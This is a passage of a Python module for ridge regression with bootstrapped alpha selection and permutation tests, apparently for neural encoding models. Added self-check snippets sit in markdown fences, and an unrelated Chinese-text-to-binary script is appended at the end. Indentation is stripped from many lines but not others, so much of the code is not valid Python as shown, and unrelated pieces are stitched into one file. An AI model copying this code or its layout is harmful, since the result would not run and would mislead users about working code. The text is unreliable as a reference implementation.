resp : array_like, shape (T, M)
Responses with T time points and M separate responses.
alpha : float or array_like, shape (M,)
Regularization parameter. Can be given as a single value (which is applied to
all M responses) or separate values for each response.
    normalpha : boolean
        Unused in this function; accepted for call-signature compatibility with ridge.
    force_cmode : boolean or None
        If not None, overrides the automatic choice of covariance mode; otherwise
        cmode is True when stim has fewer time points than features.
    covmat : array_like or None
        Precomputed covariance matrix (stim . stim.T if cmode, else stim.T . stim).
    Q : array_like or None
        Precomputed eigenvectors of covmat, to skip the eigendecomposition.
    L : array_like or None
        Precomputed eigenvalues of covmat, to skip the eigendecomposition.
    singcutoff : float
        Unused in this function; accepted for call-signature compatibility.
Returns
-------
wt : array_like, shape (N, M)
Linear regression weights.
"""
if force_cmode is not None:
cmode = force_cmode
else:
cmode = stim.shape[0]<stim.shape[1]
    print("Cmode =", cmode)
if cmode:
print("Number of time points is less than the number of features")
else:
print("Number of time points is greater than the number of features")
logger.info("Doing Eigenvalue decomposition on the full stimulus matrix...")
if cmode: # Make covmat first dim x first dim
if covmat is None:
            print("stim shape:", stim.shape)
            covmat = np.array(np.dot(stim, stim.T))
            print("Covmat shape:", covmat.shape)
if Q is None and L is None:
L, Q = np.linalg.eigh(covmat)
        print("COV L.T stim.T resp:", stim.T.shape, Q.shape, Q.T.shape, resp.shape)
Q1 = np.dot(stim.T, Q)
Q2 = np.dot(Q.T, resp)
else: # Make covmat second dim x second dim
if covmat is None:
            print("stim shape (not cmode):", stim.shape)
            covmat = np.array(np.dot(stim.T, stim))
            print("Covmat shape:", covmat.shape)
if Q is None and L is None:
L, Q = np.linalg.eigh(covmat)
        print("Q.T, stim.T, resp shapes:", Q.T.shape, stim.T.shape, resp.shape)
QT_XT_Y = np.dot(Q.T, np.dot(stim.T, resp))
# Expand alpha to a collection if it's just a single value
    if isinstance(alpha, (int, float)):
alpha = np.ones(resp.shape[1]) * alpha
# Compute weights for each alpha
logger.info("Computing weights")
ualphas = np.unique(alpha)
wt = np.zeros((stim.shape[1], resp.shape[1]))
for ua in ualphas:
selected_elec = np.nonzero(alpha==ua)[0]
        D = np.diag(1.0 / (L + ua))  # Regularized inverse eigenvalues (penalty enters as ua here, not ua**2 as in ridge)
if cmode:
            awt = np.dot(Q1, np.dot(D, Q2[:,selected_elec]))
else:
awt = np.dot(Q, np.dot(D, QT_XT_Y[:,selected_elec]))
wt[:,selected_elec] = awt
return wt
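# A hedged sanity check (demo only; not part of the original API) that both
# branches of eigridge() match the direct solve (X^T X + alpha I)^{-1} X^T y.
# Note the penalty is alpha here, not alpha**2 as in ridge(). The cmode branch
# relies on the push-through identity
# (X^T X + aI)^{-1} X^T = X^T (X X^T + aI)^{-1}.
def _demo_eigridge_equivalence():
    import numpy as np
    rng = np.random.RandomState(1)
    X = rng.randn(30, 8)
    y = rng.randn(30, 2)
    a = 3.0
    wt_closed = np.linalg.solve(np.dot(X.T, X) + a * np.eye(8), np.dot(X.T, y))
    # Feature-space (not cmode) branch: eigendecompose the N x N covariance
    L, Q = np.linalg.eigh(np.dot(X.T, X))
    wt_eig = np.dot(Q, np.dot(np.diag(1.0 / (L + a)), np.dot(Q.T, np.dot(X.T, y))))
    # Sample-space (cmode) branch: eigendecompose the T x T Gram matrix
    Lk, Qk = np.linalg.eigh(np.dot(X, X.T))
    wt_kern = np.dot(np.dot(X.T, Qk), np.dot(np.diag(1.0 / (Lk + a)), np.dot(Qk.T, y)))
    return bool(np.allclose(wt_eig, wt_closed) and np.allclose(wt_kern, wt_closed))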
def ridge_corr(Rstim, Pstim, Rresp, Presp, alphas, normalpha=False, corrmin=0.2,
singcutoff=1e-10, use_corr=True, logger=ridge_logger):
"""Uses ridge regression to find a linear transformation of [Rstim] that approximates [Rresp],
then tests by comparing the transformation of [Pstim] to [Presp]. This procedure is repeated
for each regularization parameter alpha in [alphas]. The correlation between each prediction and
each response for each alpha is returned. The regression weights are NOT returned, because
computing the correlations without computing regression weights is much, MUCH faster.
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M responses.
alphas : list or array_like, shape (A,)
Ridge parameters to be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value (LSV) norm of
Rstim. Good for comparing models with different numbers of parameters.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested, the number of responses with correlation
greater than corrmin minus the number of responses with correlation less than negative corrmin
will be printed. For long-running regressions this vague metric of non-centered skewness can
give you a rough sense of how well the model is working before it's done.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
Returns
-------
Rcorrs : array_like, shape (A, M)
The correlation between each predicted response and each column of Presp for each alpha.
"""
## Calculate SVD of stimulus matrix
logger.info("Doing SVD...")
try:
U,S,Vh = np.linalg.svd(Rstim, full_matrices=False)
except np.linalg.LinAlgError:
logger.info("NORMAL SVD FAILED, trying more robust dgesvd..")
from text.regression.svd_dgesvd import svd_dgesvd
U,S,Vh = svd_dgesvd(Rstim, full_matrices=False)
## Truncate tiny singular values for speed
origsize = S.shape[0]
ngoodS = np.sum(S > singcutoff)
nbad = origsize-ngoodS
U = U[:,:ngoodS]
S = S[:ngoodS]
Vh = Vh[:ngoodS]
logger.info("Dropped %d tiny singular values.. (U is now %s)"%(nbad, str(U.shape)))
## Normalize alpha by the LSV norm
norm = S[0]
logger.info("Training stimulus has LSV norm: %0.03f"%norm)
if normalpha:
nalphas = alphas * norm
else:
nalphas = alphas
## Precompute some products for speed
UR = np.dot(U.T, Rresp) ## Precompute this matrix product for speed
PVh = np.dot(Pstim, Vh.T) ## Precompute this matrix product for speed
#Prespnorms = np.apply_along_axis(np.linalg.norm, 0, Presp) ## Precompute test response norms
zPresp = zs(Presp)
#Prespvar = Presp.var(0)
Prespvar_actual = Presp.var(0)
Prespvar = (np.ones_like(Prespvar_actual) + Prespvar_actual) / 2.0
logger.info("Average difference between actual & assumed Prespvar: %0.3f" % (Prespvar_actual - Prespvar).mean())
Rcorrs = [] ## Holds training correlations for each alpha
for na, a in zip(nalphas, alphas):
        D = S / (S ** 2 + na ** 2) ## Reweight singular values by the (possibly normalized) ridge parameter
pred = np.dot(mult_diag(D, PVh, left=False), UR) ## Best (1.75 seconds to prediction in test)
# pred = np.dot(mult_diag(D, np.dot(Pstim, Vh.T), left=False), UR) ## Better (2.0 seconds to prediction in test)
# pvhd = reduce(np.dot, [Pstim, Vh.T, D]) ## Pretty good (2.4 seconds to prediction in test)
# pred = np.dot(pvhd, UR)
# wt = reduce(np.dot, [Vh.T, D, UR]).astype(dtype) ## Bad (14.2 seconds to prediction in test)
# wt = reduce(np.dot, [Vh.T, D, U.T, Rresp]).astype(dtype) ## Worst
# pred = np.dot(Pstim, wt) ## Predict test responses
if use_corr:
#prednorms = np.apply_along_axis(np.linalg.norm, 0, pred) ## Compute predicted test response norms
#Rcorr = np.array([np.corrcoef(Presp[:,ii], pred[:,ii].ravel())[0,1] for ii in range(Presp.shape[1])]) ## Slowly compute correlations
#Rcorr = np.array(np.sum(np.multiply(Presp, pred), 0)).squeeze()/(prednorms*Prespnorms) ## Efficiently compute correlations
Rcorr = (zPresp * zs(pred)).mean(0)
else:
## Compute variance explained
resvar = (Presp - pred).var(0)
Rsq = 1 - (resvar / Prespvar)
Rcorr = np.sqrt(np.abs(Rsq)) * np.sign(Rsq)
Rcorr[np.isnan(Rcorr)] = 0
Rcorrs.append(Rcorr)
log_template = "Training: alpha=%0.3f, mean corr=%0.5f, max corr=%0.5f, over-under(%0.2f)=%d"
log_msg = log_template % (a,
np.mean(Rcorr),
np.max(Rcorr),
corrmin,
(Rcorr>corrmin).sum()-(-Rcorr>corrmin).sum())
logger.info(log_msg)
return Rcorrs
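# Not part of the original module -- a minimal self-check of the SVD shortcut used in
# ridge_corr, with made-up shapes. For a single alpha, reweighting the singular values by
# S / (S**2 + alpha**2) reproduces the closed-form ridge prediction (penalty alpha**2):

```python
import numpy as np

rng = np.random.default_rng(0)
Rstim = rng.standard_normal((50, 8))   # training stimuli (TR x N)
Rresp = rng.standard_normal((50, 3))   # training responses (TR x M)
Pstim = rng.standard_normal((20, 8))   # test stimuli (TP x N)
alpha = 10.0

# SVD route, as in ridge_corr above
U, S, Vh = np.linalg.svd(Rstim, full_matrices=False)
D = S / (S ** 2 + alpha ** 2)
pred_svd = (np.dot(Pstim, Vh.T) * D) @ np.dot(U.T, Rresp)

# Closed-form route: wt = (X.T X + alpha**2 I)^-1 X.T Y
wt = np.linalg.solve(Rstim.T @ Rstim + alpha ** 2 * np.eye(8), Rstim.T @ Rresp)
pred_direct = Pstim @ wt

assert np.allclose(pred_svd, pred_direct)
```

# The SVD route never forms wt explicitly, which is why ridge_corr is so much faster
# when only correlations are needed.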
def eigridge_corr(Rstim, Pstim, Rresp, Presp, alphas, normalpha=False, corrmin=0.2,
singcutoff=1e-10, use_corr=True, force_cmode=None, covmat=None, logger=ridge_logger):
"""Uses ridge regression with eigenvalue decomposition (instead of SVD)
to find a linear transformation of [Rstim] that approximates [Rresp],
then tests by comparing the transformation of [Pstim] to [Presp]. This procedure is repeated
for each regularization parameter alpha in [alphas]. The correlation between each prediction and
each response for each alpha is returned. The regression weights are NOT returned, because
computing the correlations without computing regression weights is much, MUCH faster.
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M responses.
alphas : list or array_like, shape (A,)
Ridge parameters to be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
normalpha : boolean
Whether ridge parameters should be normalized by the largest singular value (LSV) norm of
Rstim. Good for comparing models with different numbers of parameters.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested, the number of responses with correlation
greater than corrmin minus the number of responses with correlation less than negative corrmin
will be printed. For long-running regressions this vague metric of non-centered skewness can
give you a rough sense of how well the model is working before it's done.
    singcutoff : float
        Not used by this function (no SVD is computed here); accepted only for interface
        compatibility with ridge_corr, which uses it to discard near-zero singular values of Rstim.
    use_corr : boolean
        If True, this function will use correlation as its metric of model fit. If False, this function
        will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
        this can make a big difference -- highly regularized solutions will have very small norms and
        will thus explain very little variance while still leading to high correlations, as correlation
        is scale-free while R**2 is not.
    force_cmode : boolean or None
        If not None, overrides the automatic choice of covariance mode. cmode=True uses the
        (TR, TR) covariance np.dot(Rstim, Rstim.T); cmode=False uses the (N, N) covariance
        np.dot(Rstim.T, Rstim). By default cmode is True when TR < N.
    covmat : array_like or None
        Precomputed covariance matrix matching the selected cmode. If None, it is computed here.
Returns
-------
Rcorrs : array_like, shape (A, M)
The correlation between each predicted response and each column of Presp for each alpha.
"""
if force_cmode is not None:
cmode = force_cmode
else:
cmode = Rstim.shape[0]<Rstim.shape[1]
    # cmode=True: fewer time points than features, so use the (TR, TR) "dual" covariance;
    # cmode=False: use the (N, N) feature covariance.
logger.info("Doing Eigenvalue decomposition...")
if cmode: # Make covmat first dim x first dim
        if covmat is None:
            covmat = np.array(np.dot(Rstim, Rstim.T))
        L, Q = np.linalg.eigh(covmat)
        Q1 = np.dot(Rstim.T, Q)
        Q2 = np.dot(Q.T, Rresp)
else: # Make covmat second dim x second dim
        if covmat is None:
            covmat = np.array(np.dot(Rstim.T, Rstim))
        L, Q = np.linalg.eigh(covmat)
QT_XT_Y = np.dot(Q.T, np.dot(Rstim.T, Rresp))
    ## The eigendecomposition plays the role of the SVD here: covmat = Q diag(L) Q.T, with L = S**2
    ## Precompute some products for speed
    if cmode:
        PQ1 = np.dot(Pstim, Q1) ## Precompute this matrix product for speed (dual basis)
    else:
        XQ = np.dot(Pstim, Q) ## Precompute this matrix product for speed
    zPresp = zs(Presp)
    Prespvar = Presp.var(0)
    Rcorrs = [] ## Holds training correlations for each alpha
    for a in alphas:
        D = 1 / (L + a) ## Reweight eigenvectors by the ridge parameter (eigridge)
        if cmode:
            ## Dual solution: wt = Rstim.T (Rstim Rstim.T + a I)^-1 Rresp = Q1 diag(D) Q2
            pred = np.dot(mult_diag(D, PQ1, left=False), Q2)
        else:
            pred = np.dot(mult_diag(D, XQ, left=False), QT_XT_Y)
if use_corr:
#prednorms = np.apply_along_axis(np.linalg.norm, 0, pred) ## Compute predicted test response norms
#Rcorr = np.array([np.corrcoef(Presp[:,ii], pred[:,ii].ravel())[0,1] for ii in range(Presp.shape[1])]) ## Slowly compute correlations
#Rcorr = np.array(np.sum(np.multiply(Presp, pred), 0)).squeeze()/(prednorms*Prespnorms) ## Efficiently compute correlations
Rcorr = (zPresp * zs(pred)).mean(0)
else:
## Compute variance explained
resvar = (Presp - pred).var(0)
Rsq = 1 - (resvar / Prespvar)
Rcorr = np.sqrt(np.abs(Rsq)) * np.sign(Rsq)
Rcorr[np.isnan(Rcorr)] = 0
Rcorrs.append(Rcorr)
log_template = "Training: alpha=%0.3f, mean corr=%0.5f, max corr=%0.5f, over-under(%0.2f)=%d"
log_msg = log_template % (a,
np.mean(Rcorr),
np.max(Rcorr),
corrmin,
(Rcorr>corrmin).sum()-(-Rcorr>corrmin).sum())
logger.info(log_msg)
return Rcorrs
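# Not part of the original module -- a self-check of the eigendecomposition route with
# made-up shapes. Note the parameterization difference: eigridge_corr adds `a` directly
# to the eigenvalues L (= S**2), so its effective penalty is a, where ridge_corr's is alpha**2:

```python
import numpy as np

rng = np.random.default_rng(1)
Rstim = rng.standard_normal((60, 5))
Rresp = rng.standard_normal((60, 2))
Pstim = rng.standard_normal((10, 5))
a = 25.0

# Eigendecomposition route (the cmode=False branch above): D = 1 / (L + a)
L, Q = np.linalg.eigh(Rstim.T @ Rstim)
D = 1 / (L + a)
pred_eig = ((Pstim @ Q) * D) @ (Q.T @ (Rstim.T @ Rresp))

# Same answer as solving (X.T X + a I) wt = X.T Y -- the penalty is a, not a**2
wt = np.linalg.solve(Rstim.T @ Rstim + a * np.eye(5), Rstim.T @ Rresp)
assert np.allclose(pred_eig, Pstim @ wt)
```

# So alphas chosen with the SVD routines are not directly interchangeable with the
# eigendecomposition routines: alpha_eig corresponds to alpha_svd**2.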
def bootstrap_ridge(Rstim, Rresp, Pstim, Presp, alphas, nboots, chunklen, nchunks,
corrmin=0.2, joined=None, singcutoff=1e-10, normalpha=False, single_alpha=False,
use_corr=True, logger=ridge_logger, return_wts=True, use_svd=False):
"""Uses ridge regression with a bootstrapped held-out set to get optimal alpha values for each response.
[nchunks] random chunks of length [chunklen] will be taken from [Rstim] and [Rresp] for each regression
run. [nboots] total regression runs will be performed. The best alpha value for each response will be
averaged across the bootstraps to estimate the best alpha for that response.
If [joined] is given, it should be a list of lists where the STRFs for all the voxels in each sublist
will be given the same regularization parameter (the one that is the best on average).
Parameters
----------
Rstim : array_like, shape (TR, N)
Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M different responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M different responses. Each response should be Z-scored across
time.
alphas : list or array_like, shape (A,)
Ridge parameters that will be tested. Should probably be log-spaced. np.logspace(0, 3, 20) works well.
nboots : int
The number of bootstrap samples to run. 15 to 30 works well.
chunklen : int
On each sample, the training data is broken into chunks of this length. This should be a few times
longer than your delay/STRF. e.g. for a STRF with 3 delays, I use chunks of length 10.
nchunks : int
The number of training chunks held out to test ridge parameters for each bootstrap sample. The product
of nchunks and chunklen is the total number of training samples held out for each sample, and this
product should be about 20 percent of the total length of the training data.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested for each bootstrap sample, the number of
responses with correlation greater than this value will be printed. For long-running regressions this
can give a rough sense of how well the model works before it's done.
joined : None or list of array_like indices
If you want the STRFs for two (or more) responses to be directly comparable, you need to ensure that
the regularization parameter that they use is the same. To do that, supply a list of the response sets
that should use the same ridge parameter here. For example, if you have four responses, joined could
        be [np.array([0,1]), np.array([2,3])], in which case responses 0 and 1 will use the same ridge
        parameter (which will be the parameter that is best on average for those two), and likewise for
        responses 2 and 3.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
normalpha : boolean
Whether ridge parameters (alphas) should be normalized by the largest singular value (LSV)
norm of Rstim. Good for rigorously comparing models with different numbers of parameters.
single_alpha : boolean
Whether to use a single alpha for all responses. Good for identification/decoding.
    use_corr : boolean
        If True, this function will use correlation as its metric of model fit. If False, this function
        will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
        this can make a big difference -- highly regularized solutions will have very small norms and
        will thus explain very little variance while still leading to high correlations, as correlation
        is scale-free while R**2 is not.
    return_wts : boolean
        If True (default), fit weights on the full training set with the selected alphas and also
        return test-set predictions. If False, return only the results of the alpha search.
    use_svd : boolean
        If True, use the SVD-based ridge_corr/ridge routines; if False (default), use the
        eigendecomposition-based eigridge_corr/eigridge routines.
Returns
-------
wt : array_like, shape (N, M)
Regression weights for N features and M responses.
corrs : array_like, shape (M,)
Validation set correlations. Predicted responses for the validation set are obtained using the regression
weights: pred = np.dot(Pstim, wt), and then the correlation between each predicted response and each
column in Presp is found.
alphas : array_like, shape (M,)
The regularization coefficient (alpha) selected for each voxel using bootstrap cross-validation.
bootstrap_corrs : array_like, shape (A, M, B)
Correlation between predicted and actual responses on randomly held out portions of the training set,
for each of A alphas, M voxels, and B bootstrap samples.
    valinds : array_like, shape (TH, B)
        The indices of the training data that were used as "validation" for each bootstrap sample.
    pred : array_like, shape (TP, M)
        Predicted test responses (returned only when return_wts is True).
    Pstim : array_like, shape (TP, N)
        The test stimuli, returned unchanged (only when return_wts is True).

    When return_wts is False, only (alphas, bootstrap_corrs, valinds) are returned.
    """
nresp, nvox = Rresp.shape
valinds = [] # Will hold the indices into the validation data for each bootstrap
Rcmats = []
for bi in counter(range(nboots), countevery=1, total=nboots):
logger.info("Selecting held-out test set..")
allinds = range(nresp)
indchunks = list(zip(*[iter(allinds)]*chunklen))
random.shuffle(indchunks)
heldinds = list(itools.chain(*indchunks[:nchunks]))
notheldinds = list(set(allinds)-set(heldinds))
valinds.append(heldinds)
RRstim = Rstim[notheldinds,:]
PRstim = Rstim[heldinds,:]
RRresp = Rresp[notheldinds,:]
PRresp = Rresp[heldinds,:]
if use_svd:
# Run ridge regression using this test set
Rcmat = ridge_corr(RRstim, PRstim, RRresp, PRresp, alphas,
corrmin=corrmin, singcutoff=singcutoff,
normalpha=normalpha, use_corr=use_corr,
logger=logger)
else:
# Run ridge regression using this test set
Rcmat = eigridge_corr(RRstim, PRstim, RRresp, PRresp, alphas,
corrmin=corrmin, singcutoff=singcutoff,
normalpha=normalpha, use_corr=use_corr,
logger=logger)
Rcmats.append(Rcmat)
# Find best alphas
if nboots>0:
allRcorrs = np.dstack(Rcmats)
else:
allRcorrs = None
if not single_alpha:
if nboots==0:
raise ValueError("You must run at least one cross-validation step to assign "
"different alphas to each response.")
logger.info("Finding best alpha for each voxel..")
if joined is None:
# Find best alpha for each voxel
meanbootcorrs = allRcorrs.mean(2)
bestalphainds = np.argmax(meanbootcorrs, 0)
valphas = alphas[bestalphainds]
else:
# Find best alpha for each group of voxels
valphas = np.zeros((nvox,))
for jl in joined:
# Mean across voxels in the set, then mean across bootstraps
jcorrs = allRcorrs[:,jl,:].mean(1).mean(1)
bestalpha = np.argmax(jcorrs)
valphas[jl] = alphas[bestalpha]
else:
logger.info("Finding single best alpha..")
if nboots==0:
if len(alphas)==1:
bestalphaind = 0
bestalpha = alphas[0]
else:
                raise ValueError("You must run at least one cross-validation step "
                                 "to choose best overall alpha, or only supply one "
                                 "possible alpha value.")
else:
meanbootcorr = allRcorrs.mean(2).mean(1)
bestalphaind = np.argmax(meanbootcorr)
bestalpha = alphas[bestalphaind]
valphas = np.array([bestalpha]*nvox)
logger.info("Best alpha = %0.3f"%bestalpha)
if return_wts:
# Find weights
logger.info("Computing weights for each response using entire training set..")
if use_svd:
wt = ridge(Rstim, Rresp, valphas, singcutoff=singcutoff, normalpha=normalpha)
else:
wt = eigridge(Rstim, Rresp, valphas, singcutoff=singcutoff, normalpha=normalpha)
# Predict responses on prediction set
        logger.info("Predicting responses for prediction set..")
if wt.shape[0]==Pstim.shape[1]+1:
logger.info("Using intercept in prediction")
pred = np.dot(Pstim, wt[1:]) + wt[0]
else:
pred = np.dot(Pstim, wt)
# Find prediction correlations
nnpred = np.nan_to_num(pred)
if use_corr:
corrs = np.nan_to_num(np.array([np.corrcoef(Presp[:,ii], nnpred[:,ii].ravel())[0,1]
for ii in range(Presp.shape[1])]))
else:
resvar = (Presp-pred).var(0)
Rsqs = 1 - (resvar / Presp.var(0))
corrs = np.sqrt(np.abs(Rsqs)) * np.sign(Rsqs)
return wt, corrs, valphas, allRcorrs, valinds, pred, Pstim ## LH ADDED
else:
return valphas, allRcorrs, valinds
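# Not part of the original module -- a standalone sketch (toy sizes) of the chunked
# holdout selection used in the bootstrap loop above. The zip(*[iter(...)]*chunklen)
# idiom groups consecutive indices into non-overlapping chunks, so held-out timepoints
# stay contiguous and temporal autocorrelation leaks less between train and holdout:

```python
import itertools as itools
import random

nresp, chunklen, nchunks = 20, 5, 2
allinds = range(nresp)
indchunks = list(zip(*[iter(allinds)] * chunklen))   # [(0..4), (5..9), (10..14), (15..19)]
random.shuffle(indchunks)
heldinds = list(itools.chain(*indchunks[:nchunks]))  # nchunks random chunks held out
notheldinds = list(set(allinds) - set(heldinds))     # everything else trains

assert len(heldinds) == chunklen * nchunks
assert set(heldinds).isdisjoint(notheldinds)
assert len(heldinds) + len(notheldinds) == nresp
```

# Note the idiom silently drops a trailing partial chunk when nresp is not a multiple
# of chunklen; those leftover timepoints simply land in the training split.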
def bootstrap_ridge_shuffle(orig_STRF, Rstim, Rresp, Pstim, Presp, valpha, nboots, chunklen,
corrmin=0.2, joined=None, singcutoff=1e-10, normalpha=False, single_alpha=False,
use_corr=True, logger=ridge_logger, return_wts=False, use_svd=False):
"""Uses ridge regression to get distribution of weights when training set is shuffled (for a "null"
distribution of the weights).
    Rresp will be shuffled by permuting its rows in random chunks of length [chunklen] for each
    regression run. [nboots] total regression runs will be performed, each using the fixed,
    previously selected ridge parameter(s) [valpha]; no alpha search is performed here.
Parameters
----------
    orig_STRF : array_like, shape (N, M)
        The unshuffled regression weights whose significance is being tested.
    Rstim : array_like, shape (TR, N)
        Training stimuli with TR time points and N features. Each feature should be Z-scored across time.
Rresp : array_like, shape (TR, M)
Training responses with TR time points and M different responses (voxels, neurons, what-have-you).
Each response should be Z-scored across time.
Pstim : array_like, shape (TP, N)
Test stimuli with TP time points and N features. Each feature should be Z-scored across time.
Presp : array_like, shape (TP, M)
Test responses with TP time points and M different responses. Each response should be Z-scored across
time.
    valpha : array_like, shape (M,)
        The ridge parameter to use for each response (e.g. as selected by bootstrap_ridge).
nboots : int
The number of bootstrap samples to run. 15 to 30 works well.
chunklen : int
On each sample, the training data is broken into chunks of this length. This should be a few times
longer than your delay/STRF. e.g. for a STRF with 3 delays, I use chunks of length 10.
corrmin : float in [0..1]
Purely for display purposes. After each alpha is tested for each bootstrap sample, the number of
responses with correlation greater than this value will be printed. For long-running regressions this
can give a rough sense of how well the model works before it's done.
    joined : None or list of array_like indices
        Unused here; accepted for interface compatibility with bootstrap_ridge.
singcutoff : float
The first step in ridge regression is computing the singular value decomposition (SVD) of the
stimulus Rstim. If Rstim is not full rank, some singular values will be approximately equal
to zero and the corresponding singular vectors will be noise. These singular values/vectors
should be removed both for speed (the fewer multiplications the better!) and accuracy. Any
singular values less than singcutoff will be removed.
normalpha : boolean
Whether ridge parameters (alphas) should be normalized by the largest singular value (LSV)
norm of Rstim. Good for rigorously comparing models with different numbers of parameters.
single_alpha : boolean
Whether to use a single alpha for all responses. Good for identification/decoding.
use_corr : boolean
If True, this function will use correlation as its metric of model fit. If False, this function
will instead use variance explained (R-squared) as its metric of model fit. For ridge regression
this can make a big difference -- highly regularized solutions will have very small norms and
will thus explain very little variance while still leading to high correlations, as correlation
is scale-free while R**2 is not.
    Returns
    -------
    wts : list
        The weights fit to each shuffled training set (populated only when return_wts is True).
    valinds : list of lists
        The shuffled row orderings used for each bootstrap sample.
    pvals : array_like, shape (N, M)
        One minus the fraction of shuffles on which |orig_STRF| exceeded the shuffled weight
        magnitude -- a two-tailed permutation p-value for each weight.
    """
nresp, nvox = Rresp.shape
valinds = [] # Will hold the indices into the validation data for each bootstrap
wts = []
mean_diff = np.zeros((orig_STRF.shape[0], orig_STRF.shape[1], nboots))
pvals = np.zeros((orig_STRF.shape[0], orig_STRF.shape[1]))
logger.info("Calculating covariance matrix and saving")
covmat = np.array(np.dot(Rstim.T, Rstim))
logger.info("Doing eigenvalue decomposition on stim cov matrix")
L, Q = np.linalg.eigh(covmat)
for bi in counter(range(nboots), countevery=1, total=nboots):
logger.info("Selecting held-out test set..")
allinds = range(nresp)
indchunks = list(zip(*[iter(allinds)]*chunklen))
random.shuffle(indchunks)
shuffinds = list(itools.chain(*indchunks))
extra_inds = np.setdiff1d(allinds, shuffinds).tolist()
shuffinds.extend(extra_inds)
valinds.append(shuffinds)
RRresp = Rresp[shuffinds,:] # Train responses, now shuffled by chunks
# Find weights
logger.info("Computing weights for each response using shuffled training set..")
if use_svd:
wt = ridge(Rstim, RRresp, valpha, singcutoff=singcutoff, normalpha=normalpha)
else:
wt = eigridge(Rstim, RRresp, valpha, singcutoff=singcutoff, normalpha=normalpha, Q=Q, L=L, covmat=covmat)
logger.info("Calculating difference between original STRF weights and shuffled weights")
# This calculates the magnitude of each, thus ensuring a two-tailed test
mean_diff[:,:,bi] = np.abs(orig_STRF) - np.abs(wt)
if return_wts:
wts.append(wt)
# Calculate the p-values given the difference in weights
logger.info("Calculating shuffled p-value now")
    pvals = 1. - np.sum(mean_diff > 0, axis=2, dtype=float) / nboots  # np.float is removed in NumPy >= 1.24
#logger.info(pvals)
return wts, valinds, pvals
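# Not part of the original module -- a toy illustration of the two-tailed permutation
# p-value computed at the end of bootstrap_ridge_shuffle. The "shuffled" weights here
# are just random stand-ins for weights refit to chunk-permuted responses; shapes and
# values are made up:

```python
import numpy as np

rng = np.random.default_rng(2)
nboots = 100
orig_STRF = np.array([[3.0, 0.1]])                 # one strong weight, one weak weight
shuffled = rng.standard_normal((1, 2, nboots))     # stand-in null-distribution weights
mean_diff = np.abs(orig_STRF)[:, :, None] - np.abs(shuffled)
pvals = 1. - np.sum(mean_diff > 0, axis=2, dtype=float) / nboots

assert pvals[0, 0] < pvals[0, 1]   # the strong weight gets the smaller p-value
assert pvals.shape == orig_STRF.shape
```

# Comparing magnitudes (np.abs on both sides) is what makes the test two-tailed: a large
# negative original weight is treated the same as a large positive one.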
# --- 中文转二进制.py ("Chinese text to binary"), from ZSX-JOJO/crawler_html2pdf (Apache-2.0) ---
content = ""
def encode(text):
    encode_content = []
    for i in text:  # was missing in the original, leaving `i` undefined
        encode_content.append(format(ord(i), 'b'))
    print(" ".join(encode_content))
def decode(text):
content = text.split(" ")
decode_content = []
for i in content:
decode_content.append(chr(int(i, 2)))
print("".join(decode_content))
if __name__ == '__main__':
    text = "把那串01的文本粘贴在这里"  # "paste the string of 0s and 1s to decode here"
decode(text)
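# Not part of the original file -- an illustrative round trip using return-value
# variants of encode/decode (hypothetical names to_bits/from_bits; the helpers above
# print instead of returning). Note the single-space delimiter means text containing
# spaces would not survive the round trip:

```python
def to_bits(text):
    # one space-separated binary token per character
    return " ".join(format(ord(c), 'b') for c in text)

def from_bits(bits):
    # inverse: parse each token as base-2 and map back to a character
    return "".join(chr(int(b, 2)) for b in bits.split(" "))

sample = "把那串01的文本粘贴在这里"
assert from_bits(to_bits(sample)) == sample
```

# Chinese characters simply get longer binary tokens than ASCII, since ord() returns
# the full Unicode code point.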
